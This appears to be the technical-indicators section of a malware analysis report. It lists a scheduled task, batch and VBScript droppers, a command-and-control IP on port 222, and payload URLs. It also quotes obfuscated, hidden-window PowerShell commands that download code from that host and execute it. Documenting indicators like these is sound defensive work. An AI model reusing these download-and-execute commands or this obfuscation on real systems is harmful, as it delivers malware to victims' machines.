Technical Information
- <SYSTEM32>\tasks\update edge
- C:\users\public\conted.bat
- C:\users\public\conted.vbs
- '45.##6.209.4':222
- http://45.###.209.4:222/xlm.txt via 45.##6.209.4
- http://45.###.209.4:222/mdm.jpg via 45.##6.209.4
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.126.209.4:222/mdm.jpg'')'.RePLACe('VAN','AD...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.126.209.4:222/mdm.jpg'')'.RePLACe('VAN','AD...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.126.209.4:222/mdm.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];...